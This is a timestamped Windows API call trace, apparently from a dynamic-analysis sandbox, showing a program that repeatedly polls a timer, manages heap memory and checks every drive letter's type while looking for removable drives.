[0215.928] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.929] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.929] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0215.929] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.929] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.929] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0215.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.929] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.929] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0215.929] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.929] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0215.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.930] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.930] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.930] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.930] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.931] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.931] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.931] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.931] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.931] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.931] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.932] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.932] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.932] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.932] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.932] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.933] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.933] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.933] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.933] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.934] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.934] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.934] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.934] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.934] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.935] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.935] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.935] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.936] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0215.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.937] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0215.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fe0 [0215.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fe0 | out: hHeap=0x12c0000) returned 1 [0215.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0215.937] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0215.937] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.938] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0215.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0215.938] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.938] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0215.939] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.939] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.939] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.939] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.939] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.939] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0215.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0215.940] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.940] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.940] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.940] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.940] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.941] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.941] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.941] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.941] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.941] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.942] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.942] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.942] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.942] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.942] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.943] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.943] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.944] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.944] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.944] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.944] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.944] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.944] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.944] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.945] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.945] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.945] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0215.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.946] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0215.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fc0 [0215.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fc0 | out: hHeap=0x12c0000) returned 1 [0215.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0215.946] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0215.946] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0215.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.947] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.947] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.947] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.947] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.948] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.948] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.948] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.948] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.948] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.949] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.949] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.949] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.949] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.949] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.950] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.950] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.950] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.950] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.950] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.951] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.951] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.951] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.951] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.951] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.951] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.952] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.952] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.952] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.952] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.952] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.952] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0215.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.953] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0215.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0215.954] RtlAllocateHeap (HeapHandle=0x12c0000, 